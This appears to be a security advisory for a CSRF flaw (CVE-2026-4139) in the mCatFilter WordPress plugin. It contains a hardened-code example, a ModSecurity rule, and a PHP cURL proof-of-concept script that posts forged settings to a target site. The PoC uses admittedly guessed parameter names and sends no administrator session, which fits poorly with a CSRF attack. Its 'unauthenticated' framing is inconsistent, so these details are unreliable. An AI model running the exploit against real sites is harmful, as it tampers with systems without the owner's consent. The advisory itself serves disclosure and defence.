Atomic Edge analysis of CVE-2026-4139 (metadata-based): The mCatFilter plugin for WordPress, version 0.5.2 and earlier, contains a Cross-Site Request Forgery (CSRF) vulnerability in its compute_post() function. This function processes plugin settings updates via $_POST data without any nonce or capability validation. The vulnerability has a CVSS score of 4.3 (Medium) and can allow unauthenticated attackers to modify all plugin settings.
The root cause is the complete absence of nonce verification and capability checks within the compute_post() function. This function is called on every page load through the plugins_loaded hook, meaning it runs early in WordPress execution regardless of the user’s role. The function directly passes $_POST data to update_option() to modify plugin settings. Atomic Edge analysis infers this pattern from the CWE (352) and vulnerability description, as no source code diff is available. The description explicitly states there is no nonce or capability check, which is a confirmed detail from the vendor’s admission.
Exploitation requires tricking a site administrator into performing an action, such as clicking a malicious link or visiting a crafted page. An attacker can craft a POST request to any WordPress page (since the handler runs on plugins_loaded) with parameters that map to the plugin’s settings, including category exclusion rules, feed exclusion flags, and tag page exclusion flags. The request must include the wp_http_referer or simply be a POST submission to any WordPress URL. The specific parameter names are not disclosed, but typical WordPress plugin settings use checkbox or array parameters. The attack does not require authentication; the attacker only needs social engineering to trigger the administrator’s browser.
Remediation requires implementing standard WordPress CSRF protection. The plugin must add a nonce field to any form that modifies settings and verify that nonce in the compute_post() function using check_admin_referer() or wp_verify_nonce(). Additionally, capability checks such as current_user_can('manage_options') should be added to ensure only authorized administrators can update settings. Since no patched version exists, administrators should disable the plugin or add a virtual patch.
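As an added example (not the plugin's code, nor Atomic Edge's), the handler shape the advisory describes beside the hardened version the remediation calls for, using check_admin_referer() and current_user_can('manage_options'); the option, field and nonce names are assumed.

```php
<?php
// Added illustration, not mCatFilter's own code. Option, field and nonce names are assumed.
// Vulnerable shape as described in the advisory: every POST, from anyone, updates the options.
function mcat_compute_post_vulnerable() {
    if ( empty( $_POST ) ) {
        return;
    }
    update_option( 'mcat_categories_exclude', $_POST['mcat_categories_exclude'] ?? array() );
    update_option( 'mcat_feed_exclude', $_POST['mcat_feed_exclude'] ?? '0' );
    update_option( 'mcat_tag_page_exclude', $_POST['mcat_tag_page_exclude'] ?? '0' );
}

// Hardened version: act only on the plugin's own form, require manage_options,
// verify the nonce, and sanitize each value before it reaches update_option().
function mcat_compute_post_hardened() {
    // Assumed hidden marker field so unrelated POSTs are ignored entirely.
    if ( ! isset( $_POST['mcat_action'] ) || 'save_settings' !== $_POST['mcat_action'] ) {
        return;
    }
    // Capability check: a forged request riding a low-privilege session cannot reach update_option().
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.', 403 );
    }
    // Nonce check: check_admin_referer() dies with 403 when the nonce is absent, expired or for another action.
    check_admin_referer( 'mcat_save_settings', 'mcat_nonce' );

    // Category IDs must be positive integers; the two flags must be exactly 0 or 1.
    $categories = array_filter( array_map( 'absint', (array) ( $_POST['mcat_categories_exclude'] ?? array() ) ) );
    $feed_flag  = empty( $_POST['mcat_feed_exclude'] ) ? 0 : 1;
    $tag_flag   = empty( $_POST['mcat_tag_page_exclude'] ) ? 0 : 1;

    update_option( 'mcat_categories_exclude', array_values( $categories ) );
    update_option( 'mcat_feed_exclude', $feed_flag );
    update_option( 'mcat_tag_page_exclude', $tag_flag );
}
// admin_init runs after the current user is set up, so current_user_can() is reliable here.
add_action( 'admin_init', 'mcat_compute_post_hardened' );

// The settings form must emit the matching nonce and marker field for the checks above to pass.
function mcat_render_settings_form() {
    echo '<form method="post">';
    wp_nonce_field( 'mcat_save_settings', 'mcat_nonce' );
    echo '<input type="hidden" name="mcat_action" value="save_settings">';
    // ... settings inputs for the three options go here ...
    submit_button( 'Save Settings' );
    echo '</form>';
}
```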
Impact is limited to integrity of plugin settings only (CVSS impact sub-score: Low). An attacker could modify category exclusion rules to hide content from certain users, disable feed exclusions to expose content in RSS feeds, or alter tag page exclusions. This could lead to unintended content exposure or disruption of site functionality. No privilege escalation or data exfiltration is possible, but the CSRF vector allows unauthenticated attackers to change settings without the administrator’s consent.
Here you will find our ModSecurity-compatible rule to protect against this particular CVE.
# Atomic Edge WAF Rule - CVE-2026-4139 (metadata-based)
# Block CSRF exploitation of mCatFilter compute_post() function
# The handler runs on plugins_loaded on all pages, but this rule targets the likely settings page
# It blocks POST requests to the plugin's settings page that carry the expected settings parameters.
# It does not look for a nonce: the vulnerable function never validates one, so a nonce field is not
# a useful signal. Legitimate saves from the settings page are blocked as well while the rule is in
# place; that is the intended virtual patch until a fixed release exists.
SecRule REQUEST_METHOD "@streq POST" "id:20261321,phase:2,deny,status:403,chain,msg:'CVE-2026-4139 CSRF attempt via mCatFilter',severity:'CRITICAL',tag:'CVE-2026-4139',tag:'WordPress',tag:'mcatfilter'"
SecRule REQUEST_URI "@rx /wp-admin/options-general.php" "chain"
# Matches both a comma-separated list and the array form (mcat_categories_exclude[0]=1) that the PoC below sends
SecRule ARGS_POST:/^mcat_categories_exclude(\[\d*\])?$/ "@rx ^\d+(?:,\d+)*$" "chain"
SecRule ARGS_POST:mcat_feed_exclude "@rx ^[01]$" "chain"
SecRule ARGS_POST:mcat_tag_page_exclude "@rx ^[01]$" "t:none"
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-4139 - mCatFilter <= 0.5.2 - Cross-Site Request Forgery via compute_post() Function
// This PoC demonstrates crafting a POST request that triggers the compute_post() function
// to modify plugin settings. Since the function runs on plugins_loaded, any WordPress URL works.
// The exact parameter names are inferred from typical WordPress settings patterns.
$target_url = 'http://example.com/wp-admin/options-general.php?page=mcatfilter'; // Change to target site
// Inferred parameter names for mCatFilter plugin settings based on the vulnerability description:
// - mcat_categories_exclude[] : array of category IDs to exclude
// - mcat_feed_exclude : flag to exclude posts from feeds
// - mcat_tag_page_exclude : flag to exclude tag pages
// The actual parameter names may differ; this assumes common WordPress settings naming.
// The plugin uses update_option() so parameter names are likely stored as options.
$post_data = array(
'mcat_categories_exclude' => array(1, 2, 3), // Exclude categories 1, 2, 3
'mcat_feed_exclude' => '1', // Enable feed exclusion
'mcat_tag_page_exclude' => '0' // Disable tag page exclusion
);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIE, 'wordpress_test_cookie=WP+Cookie+check'); // Optional: bypass cookie check
curl_setopt($ch, CURLOPT_HEADER, false);
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
if ($http_code == 200) {
echo 'Exploit request sent successfully. Settings may have been updated.';
} else {
echo 'Request failed with HTTP code: ' . $http_code;
}